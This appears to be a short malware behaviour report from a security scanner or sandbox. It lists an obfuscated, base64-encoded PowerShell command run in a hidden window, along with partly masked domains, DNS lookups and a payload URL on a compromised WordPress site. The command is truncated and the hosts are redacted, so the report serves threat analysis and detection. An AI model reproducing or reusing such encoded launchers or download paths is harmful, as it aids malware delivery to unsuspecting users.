Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABBAGoAZQBuAHUAZwA3AD0AWwBjAGgAYQByAF0ANAAyADsAJABXAHMAZAB5ADQAbABlAD0AKAAnAFgAJwArACgAJwByAG0AagA1AHYAJwArACcAagAnACkAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1960
- %TEMP%\1006970.cvr
- 'er###-hofer.de':443
- 'fa###ha.com.br':80
- http://fa###ha.com.br/wp-admin/Nwi134V/
- 'er###-hofer.de':443
- DNS ASK et###nk.online
- DNS ASK af###adamx.com
- DNS ASK er###-hofer.de
- DNS ASK da##lycs.ml
- DNS ASK as###drsps.com
- DNS ASK rr#####ralheria.com.br
- DNS ASK fa###ha.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABBAGoAZQBuAHUAZwA3AD0AWwBjAGgAYQByAF0ANAAyADsAJABXAHMAZAB5ADQAbABlAD0AKAAnAFgAJwArACgAJwByAG0AagA1AHYAJwArACcAagAnACkAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQ...' (with hidden window)